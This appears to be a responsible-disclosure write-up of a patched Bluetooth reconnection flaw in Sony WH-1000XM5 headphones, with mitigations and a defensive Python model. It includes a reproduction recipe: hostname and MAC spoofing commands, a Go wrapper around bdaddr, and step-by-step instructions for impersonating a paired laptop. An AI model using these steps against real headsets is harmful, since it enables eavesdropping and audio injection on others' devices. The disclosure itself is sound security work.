Sony WH-1000XM5 Bluetooth Vulnerability: Man-in-the-Middle via Insecure Reconnection
In 2024 a Bluetooth vulnerability was found in Sony's WH-1000XM5 headphones that lets an attacker impersonate an already-paired device and connect without any user action, opening the door to man-in-the-middle attacks and audio eavesdropping. The flaw stems from an insecure Bluetooth reconnection mechanism and has been fixed by a firmware update, but it exposes a Bluetooth security problem common to high-end headphones.
2025-7-13 05:54:33 Author: infosecwriteups.com


In 2024, a critical Bluetooth vulnerability was responsibly disclosed in Sony’s premium noise-cancelling headphones, the WH-1000XM5. This flaw allows attackers to impersonate a previously paired device and connect without any user interaction. The exploit leverages weaknesses in the device’s Bluetooth reconnection mechanism, making it vulnerable to Man-in-the-Middle (MiTM) attacks, session hijacking, and unauthorized audio access — even when the device is not in pairing mode.

The vulnerability has now been patched in firmware update v2.4.1, but it highlights a broader issue in how Bluetooth reconnection is handled across many premium headsets.

The WH-1000XM5 fails to securely implement Secure Simple Pairing (SSP) during reconnection. Instead of validating re-authentication keys, the device relies only on previously cached Bluetooth MAC addresses and device names to approve a connection.

This means that if an attacker spoofs both the Bluetooth name and address of a previously paired device, the WH-1000XM5 will connect to them automatically, assuming it to be a trusted host — even if no prior pairing has occurred with that specific device.

This is a serious oversight in authentication and deviates from Bluetooth security standards.

To reproduce the vulnerability, you’ll need the following hardware:

Role            Device Model                     Bluetooth Version
Victim Device   Sony WH-1000XM5 Headphones       5.2
Master Device   Surface Laptop 4 / Pixel 7 Pro   5.1 or 5.2
Attacker        Raspberry Pi 4 Model B           5.0 (BlueZ 5.55)

sudo nano /etc/machine-info

Add line:

PRETTY_HOSTNAME=Surface Laptop 4

Restart Bluetooth:

sudo systemctl restart bluetooth

Install Go if not installed:

sudo apt install golang-go

Create a script main.go:

package main

import (
	"flag"
	"fmt"
	"os"
	"os/exec"
)

func main() {
	addr := flag.String("addr", "", "New Bluetooth MAC")
	flag.Parse()
	if *addr == "" {
		fmt.Fprintln(os.Stderr, "usage: chgbtaddr -addr XX:XX:XX:XX:XX:XX")
		os.Exit(1)
	}
	// bdaddr (BlueZ tools) rewrites the adapter address; report failures instead of ignoring them
	if out, err := exec.Command("sudo", "bdaddr", "-i", "hci0", *addr).CombinedOutput(); err != nil {
		fmt.Fprintf(os.Stderr, "bdaddr failed: %v\n%s", err, out)
		os.Exit(1)
	}
}

Compile and run it:

go build -o chgbtaddr main.go
sudo ./chgbtaddr -addr 00:11:22:33:44:55
bluetoothctl
power on
agent on
discoverable on
pairable on

Follow these steps in order:

  1. Pair WH-1000XM5 with the master device (e.g. Surface Laptop 4)
  2. Turn off the master device.
  3. Power off WH-1000XM5 (do not hold button >5s to avoid pairing mode).
  4. Spoof the Raspberry Pi’s Bluetooth MAC and name to match the master device.
  5. Set Raspberry Pi Bluetooth adapter to discoverable and pairable.
  6. Power on WH-1000XM5.

✅ Headphones automatically connect to Raspberry Pi.
❌ No pairing process is required.
⚠️ No user notification or confirmation is shown.

This demonstrates unauthorized access to a secure headset with zero user interaction.

  • main.go – Go script to spoof Bluetooth MAC address
  • WH-1000XM5_vuln_poc.pcapng – Packet capture showing unauthorized reconnection

This vulnerability enables:

  • 🎧 Audio Hijacking — Route media/audio through the attacker’s device
  • 🔁 Persistent Reconnection — Device will auto-reconnect even after power cycling
  • 👂 Eavesdropping — Attacker can record or inject fake audio
  • 🎮 Session Takeover — Disrupt legitimate Bluetooth sessions

In corporate or high-security settings, this could lead to serious privacy breaches.

Although this PoC was built around the WH-1000XM5, the researcher noted:

  • WH-1000XM4 exhibits similar behavior
  • WF-1000XM5 / XM4 may be affected
  • At least three other premium brands showed similar flaws

Common factor: All these headsets use high-performance generic Bluetooth chips with vendor-specific firmware layered over them. The vulnerability likely stems from insecure firmware design, not the Bluetooth protocol itself.

This vulnerability is a textbook example of incomplete implementation of Bluetooth SSP reconnection. It allows attackers to spoof trusted devices and bypass authentication, undermining core Bluetooth trust mechanisms.

Thanks to responsible disclosure, Sony patched this issue in v2.4.1, and acknowledged the researcher. However, this case is a wake-up call for manufacturers:

  • Implement proper SSP validation during every reconnection
  • Prevent auto-pairing based only on MAC and name
  • Notify users of any reconnection attempts
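The reconnection decision described above (cached address and name accepted as identity) and the first two recommendations, modelled as an added example that is not code from the write-up or from Sony's firmware: the vulnerable policy accepts any peer whose address and name match a stored bond, while the hardened policy additionally runs a challenge-response over the link key established at pairing, so a peer that knows only the address and name is refused. The Peer and Headset classes, the HMAC-SHA256 exchange and the address are constructed stand-ins for the Bluetooth authentication procedure, not the real functions.

```python
import hmac
import hashlib
import secrets
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class Peer:
    addr: str
    name: str
    link_key: Optional[bytes] = None  # None: this peer never completed pairing

    def respond(self, challenge: bytes) -> bytes:
        # A peer that never paired holds no link key; it can only answer with an empty one.
        return hmac.new(self.link_key or b"", challenge, hashlib.sha256).digest()

@dataclass
class Headset:
    require_auth: bool = True
    bonds: dict = field(default_factory=dict)  # addr -> (name, link_key)

    def pair(self, peer: Peer) -> None:
        # SSP pairing ends with both sides holding a shared link key (constructed 16-byte key here).
        peer.link_key = secrets.token_bytes(16)
        self.bonds[peer.addr] = (peer.name, peer.link_key)

    def reconnect(self, peer: Peer) -> bool:
        bond = self.bonds.get(peer.addr)
        if bond is None or bond[0] != peer.name:
            return False  # unknown address/name: nothing to reconnect to
        if not self.require_auth:
            # Vulnerable policy from the write-up: a cached address + name is treated as identity.
            return True
        # Hardened policy: the peer must prove possession of the link key for a fresh challenge.
        challenge = secrets.token_bytes(16)
        expected = hmac.new(bond[1], challenge, hashlib.sha256).digest()
        return hmac.compare_digest(expected, peer.respond(challenge))

def demo() -> tuple:
    addr, name = "AA:BB:CC:DD:EE:01", "Surface Laptop 4"  # constructed address
    spoofer = Peer(addr, name)  # same address and name as the laptop, but never paired
    vulnerable, hardened = Headset(require_auth=False), Headset(require_auth=True)
    vulnerable.pair(Peer(addr, name))
    laptop = Peer(addr, name)
    hardened.pair(laptop)
    return (vulnerable.reconnect(spoofer),  # True: accepted on cached address/name alone
            hardened.reconnect(spoofer),    # False: cannot answer the challenge
            hardened.reconnect(laptop))     # True: the bonded laptop still reconnects
```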

The root cause may lie in generic Bluetooth chip stacks, indicating a broader infrastructure problem.

The researcher responsibly disclosed this vulnerability via HackerOne. Despite no direct bounty, they received swag, public acknowledgment, and their findings were presented at ICSS 2025. A true example of community-driven security.

Aditya Sunny
Cybersecurity Enthusiast | Honoured by Bajaj Finance Security Heroes | Secured Meta (FB, IG, WA), Dell, Maffashion & more | Ex-Navodayan | Bug Hunter


Source: https://infosecwriteups.com/sony-wh-1000xm5-bluetooth-vulnerability-man-in-the-middle-via-insecure-reconnection-cb1125e2f77b?source=rss----7b722bfd1b8d--bug_bounty